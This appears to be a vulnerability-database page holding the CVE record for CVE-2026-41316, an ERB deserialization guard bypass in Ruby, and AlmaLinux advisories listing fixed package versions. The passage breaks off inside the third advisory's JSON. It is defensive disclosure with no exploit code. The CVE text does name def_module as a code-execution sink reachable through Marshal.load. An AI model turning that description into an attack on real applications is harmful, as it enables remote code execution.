Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-41316 (GCVE-0-2026-41316)
Vulnerability from cvelistv5 – Published: 2026-04-24 02:35 – Updated: 2026-04-25 01:45- CWE-693 - Protection Mechanism Failure
| URL | Tags |
|---|---|
| https://github.com/ruby/erb/security/advisories/G… | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-41316",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-25T01:45:02.467085Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-25T01:45:43.173Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "erb",
"vendor": "ruby",
"versions": [
{
"status": "affected",
"version": "\u003c 4.0.3.1"
},
{
"status": "affected",
"version": "= 4.0.4"
},
{
"status": "affected",
"version": "\u003e= 5.0.0, \u003c 6.0.1.1"
},
{
"status": "affected",
"version": "\u003e= 6.0.2, \u003c 6.0.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ERB is a templating system for Ruby. Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard: `ERB#def_method`, `ERB#def_module`, and `ERB#def_class`. An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely. ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4 patch the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-693",
"description": "CWE-693: Protection Mechanism Failure",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-24T02:35:41.160Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv"
}
],
"source": {
"advisory": "GHSA-q339-8rmv-2mhv",
"discovery": "UNKNOWN"
},
"title": "ERB has an @_init deserialization guard bypass via def_module / def_method / def_class"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-41316",
"datePublished": "2026-04-24T02:35:41.160Z",
"dateReserved": "2026-04-20T14:01:46.671Z",
"dateUpdated": "2026-04-25T01:45:43.173Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-41316",
"date": "2026-05-19",
"epss": "0.00109",
"percentile": "0.28728"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-41316\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-24T03:16:11.897\",\"lastModified\":\"2026-04-29T20:56:50.103\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"ERB is a templating system for Ruby. Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard: `ERB#def_method`, `ERB#def_module`, and `ERB#def_class`. An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely. ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4 patch the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-693\"}]}],\"references\":[{\"url\":\"https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41316\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-25T01:45:02.467085Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-25T01:45:39.369Z\"}}], \"cna\": {\"title\": \"ERB has an @_init deserialization guard bypass via def_module / def_method / def_class\", \"source\": {\"advisory\": \"GHSA-q339-8rmv-2mhv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"ruby\", \"product\": \"erb\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.0.3.1\"}, {\"status\": \"affected\", \"version\": \"= 4.0.4\"}, {\"status\": \"affected\", \"version\": \"\u003e= 5.0.0, \u003c 6.0.1.1\"}, {\"status\": \"affected\", \"version\": \"\u003e= 6.0.2, \u003c 6.0.4\"}]}], \"references\": [{\"url\": \"https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv\", \"name\": \"https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"ERB is a templating system for Ruby. Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard: `ERB#def_method`, `ERB#def_module`, and `ERB#def_class`. An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely. ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4 patch the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-693\", \"description\": \"CWE-693: Protection Mechanism Failure\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-24T02:35:41.160Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-41316\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-25T01:45:43.173Z\", \"dateReserved\": \"2026-04-20T14:01:46.671Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-24T02:35:41.160Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
alsa-2026:18030
Vulnerability from osv_almalinux
Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.
Security Fix(es):
- erb: ERB: Arbitrary code execution via deserialization bypass (CVE-2026-41316)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby-bundled-gems"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby-default-gems"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby-doc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby-libs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-bigdecimal"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.5-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-bundler"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.22-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-io-console"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.7.1-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-irb"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.13.1-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-json"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.2-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-minitest"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.20.0-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-mysql2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.5-3.module_el9.7.0+184+e2e36072"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-mysql2-doc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.5-3.module_el9.7.0+184+e2e36072"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-pg"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.4-2.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-pg-doc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.4-2.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-power_assert"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.3-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-psych"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.1.2-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-racc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.7.3-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-rake"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.1.0-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-rbs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.4.0-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-rdoc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.6.3.1-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-rexml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.4.4-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-rss"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.1-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-test-unit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.1-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-typeprof"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.21.9-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygems"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.5.22-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygems-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.5.22-6.module_el9.7.0+245+447713a2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. \n\nSecurity Fix(es): \n\n * erb: ERB: Arbitrary code execution via deserialization bypass (CVE-2026-41316)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:18030",
"modified": "2026-05-19T14:43:51Z",
"published": "2026-05-18T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:18030"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-41316"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2461369"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/9/ALSA-2026-18030.html"
}
],
"related": [
"CVE-2026-41316"
],
"summary": "Important: ruby:3.3 security update"
}
alsa-2026:18039
Vulnerability from osv_almalinux
Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.
Security Fix(es):
- erb: ERB: Arbitrary code execution via deserialization bypass (CVE-2026-41316)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.7-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby-default-gems"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.7-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.7-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby-doc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.7-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "ruby-libs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.7-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-bigdecimal"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.0-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-bundler"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.33-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-io-console"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.7-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-irb"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.5-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-json"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.1-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-minitest"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.14.2-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-power_assert"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.1-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-psych"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.2-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-rake"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.3-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-rbs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.0-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-rdoc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.3.4.1-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-rexml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.2.5-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-rss"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.2.9-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-test-unit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.7-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygem-typeprof"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.15.2-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygems"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.2.33-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "rubygems-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.2.33-166.el9_7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. \n\nSecurity Fix(es): \n\n * erb: ERB: Arbitrary code execution via deserialization bypass (CVE-2026-41316)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:18039",
"modified": "2026-05-19T21:34:01Z",
"published": "2026-05-18T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:18039"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-41316"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2461369"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/9/ALSA-2026-18039.html"
}
],
"related": [
"CVE-2026-41316"
],
"summary": "Important: ruby security update"
}
alsa-2026:18065
Vulnerability from osv_almalinux
Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.
Security Fix(es):
- erb: ERB: Arbitrary code execution via deserialization bypass (CVE-2026-41316)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "ruby"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "ruby-bundled-gems"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "ruby-default-gems"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "ruby-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "ruby-doc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "ruby-libs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.10-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-bigdecimal"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.5-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-bundler"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.22-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-io-console"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.7.1-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-irb"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.13.1-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-json"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.2-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-minitest"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.20.0-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-power_assert"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.3-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-psych"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.1.2-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-racc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.7.3-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-rake"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.1.0-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-rbs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.4.0-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-rdoc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.6.3.1-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-rexml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.4.4-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-rss"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.1-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-test-unit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.1-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygem-typeprof"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.21.9-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygems"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.5.22-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "rubygems-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.5.22-12.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
